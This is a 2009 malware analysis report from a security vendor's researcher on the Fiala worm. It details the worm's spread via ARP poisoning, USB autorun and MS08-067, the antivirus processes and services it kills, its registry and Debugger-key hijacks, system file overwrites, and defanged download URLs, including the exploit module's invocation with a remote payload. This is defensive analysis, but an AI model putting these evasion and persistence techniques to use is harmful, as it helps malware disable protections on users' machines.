By Tran Minh Quang, Malware Researcher, Bkis
Fiala, originating from China, first appeared in 2008. Over the time, Fiala has ceaselessly changed and improved itself, resulting in the appearance of series of new variants. Fiala has long been capable of propagating via USB or LANs by using ARP poisoning technique to insert Iframe or Script containing dozens of exploit codes for vulnerabilities of different softwares into HTTP responses. Through this infection method, Fiala can spread quickly within a LAN, and sometimes can cause system breakdown.
Being able to overwriting system files like wuauclt.exe, spoolsv.exe, userinit.exe, linkinfo.dll (depending on variants), Fiala has well protected itself against being detected or removed by antivirus softwares. If the antivirus softwares delete the virus without trying to recover these original files, users might then have to face certain troubles. Examples are: it is impossible to log into the system or to use the printer, or Windows cannot be updated, etc.
In recent times, Bkis’ honeypot reports that new Fiala variants can now spread via the notorious vulnerability MS08-067. Fiala’s author might have learned from Conficker. However, unlike Conficker, Fiala makes use of the currently available exploit tool of ph4nt0m.org. This makes the worm become even more dangerous.
You can download our free tool BkavHome to remove Fiala here
1. Details about the latest Fiala variants:
Discovered: May 09, 2009
2. Technical Details:
- Creates mutex:
- Deletes the services with the following names:
- avp, RavCCenter, RsScanSrv, RavTask, RsRavMon, ekrn.
- Ends :
- 360Safe.exe, 360tray.exe, 360rpt.EXE, Runiep.exe, Rsaupd.exe, RAv.exe, RSTray.exe, CCenter.EXE, RAVMON.EXE, Ravservice.EXE, ScanFrm.exe, rsnetsrv.EXE, RAVTRAY.EXE, RAVMOND.EXE, GuardField.exe, Ravxp.exe, GFUpd.exe, kmailmon.exe, kavstart.exe, KAVPFW.EXE, kwatch.exe, kav32.exe, kissvc.exe, UpdaterUI.exe, rfwsrv.exe, rfwProxy.exe , Rfwstub.exe, RavStub.exe, rfwmain.exe, rfwmain.exe, TBMon.exe, nod32kui.exe, nod32krn.exe, KASARP.exe, FrameworkService.exe, scan32.exe, VPC32.exe, VPTRAY.exe, AntiArp.exe, KRegEx.exe, KvXP.kxp, kvsrvxp.kxp, kvsrvxp.exe, KVWSC.ExE, Iparmor.exe, Avp.EXE, VsTskMgr.exe, EsuSafeguard.ex
- Stops the services:
- McShield, KWhatchsvc, KPfwSvc, Kingsoft Internet Security Common Servi, Symantec AntiVirus, norton AntiVirus server, DefWatch, Symantec AntiVirus Drivers Services, Symantec AntiVirus Definition Watcher, Norton AntiVirus Server,McAfee Framework +
- Writes key Debugger to force the system to run the virus instead of the following files:
- 360rpt.EXE, 360safe.EXE, 360tray.EXE, 360safebox.EXE, safeboxTray.EXE, AVP.EXE, AVP.COM, AvMonitor.EXE, Ravservice.EXE, RAVTRAY.EXE, CCenter.EXE, IceSword.EXE, Iparmor.EXE, KVMonxp.KXP, KVSrvXP.EXE, KVWSC.EXE, Navapsvc.EXE, Nod32kui.EXE, nod32krn.EXE, KRegEx.EXE, Frameworkservice.EXE, Mmsk.EXE, Ast.EXE, WOPTILITIES.EXE, Regedit.EXE, AutoRunKiller.EXE, VPC32.EXE, VPTRAY.EXE, ANTIARP.EXE, KASARP.EXE, RAV.EXE, kwatch.EXE, kmailmon.EXE, kavstart.EXE, KAVPFW.EXE, Runiep.EXE, GuardField.EXE, GFUpd.EXE, Rfwstub.EXE, rfwmain.EXE, RavStub.EXE, rsnetsvr.EXE, ScanFrm.EXE, RsMain.EXE, Rsaupd.EXE, rfwProxy.EXE, rfwsrv.EXE, SREngLdr.EXE, ArSwp.EXE, RSTray.EXE, QQDoctor.EXE, TrojanDetector.EXE, RSTray.EXE, Trojanwall.EXE, TrojDie.KXP, PFW.EXE, HijackThis.EXE, AutoRun.EXE, KPfwSvc.EXE, kissvc.EXE, kav32.EXE
- Closes windows of which the titles contain:
- NOD32, Process, Mcafee, Firewall, virus, anti, worm, SREng,...
- Copies and saves original file named "%SysDir%\linkinfo.dll" under the name "%SysDir%\dllcache\linkinfo.dll"
- Overwrites original file named:
- "%SysDir%\linkinfo.dll" so that the virus is automatically loaded on Windows startup
- Copies itself under the name:
- "GRIL.pif" together with the file "autorun.inf" onto the disk drives to run the virus when users double click on those drives
- Writes key:
- "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\explorer\advanced\folder\hidden\showall" to ensure that hidden files cannot be displayed
- Deletes key:
so that the computer cannot start in Safe mode
- Deletes registry key to prevent the following antivirus programs to start on Windows startup:
- 360Safetray, 360Safebox, KavStart, vptray, ccApp, RavTray, egui, essact.
- Downloads other malwares to the computer:
- http://c.wu[removed]com/dd/33.exe - Module download
- Sets the homepage in IE to be: http://moneymon[removed]88.com
- Creates popup windows of:
- Downloads file:
- "http://c.wu[removed]com/dd/d.gif" under the name "%WinDir%\Tasks\SA.PIF" – a rar file having password
- Creates file:
- %WinDir%\Tasks\explorer.exe - MS08-067 exploit module
- %WinDir%\Fonts\svchost.exe to decompress and run the recently downloaded file SA.PIF
- "%WinDir%\Tasks\explorer.exe" "<IP having the same IP range of the infected machine>" "http://c.wu[removed]com/t.css" to spread itself to all computers within a LAN
- Writes key:
- "HKLM\Software\Microsoft\Windows\CurrentVersion\policies\explorer\Run\360safe" to launch itself when Windows starts
- Installs Malware PushWare
- Installs WinPCap
- Creates file:
- "%SysDir%\360box.exe" to “disguise” itself as a gateway